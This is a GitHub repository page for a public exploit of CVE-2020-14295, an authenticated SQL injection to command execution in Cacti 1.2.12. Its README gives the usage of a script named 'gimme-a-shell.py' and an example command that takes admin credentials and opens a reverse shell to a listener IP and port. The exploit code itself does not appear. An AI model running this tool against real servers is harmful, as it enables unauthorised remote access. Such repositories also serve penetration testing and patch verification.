Skip to content

Authenticated SQL injection to command execution on Cacti 1.2.12

License

Notifications You must be signed in to change notification settings

0z09e/CVE-2020-14295

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2020-14295


Vulnerability details - Cacti/cacti#3622

Install

pip3 install -r requirements.txt

Usage

$ ./gimme-a-shell.py --help
usage: gimme-a-shell.py [-h] -t Target -U Username -P Password -i Shell-IP -p Shell-Port

optional arguments:
  -h, --help     show this help message and exit

required arguments:
  -t Target      Target URL
  -U Username    Cacti username
  -P Password    Cacti password
  -i Shell-IP    Reverse-Shell IP
  -p Shell-Port  Reverse-Shell Port

Example

./gimme-a-shell.py -t http://cacti.localhost -U admin -P admin -i 127.0.0.1 -p 9001

About

Authenticated SQL injection to command execution on Cacti 1.2.12

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages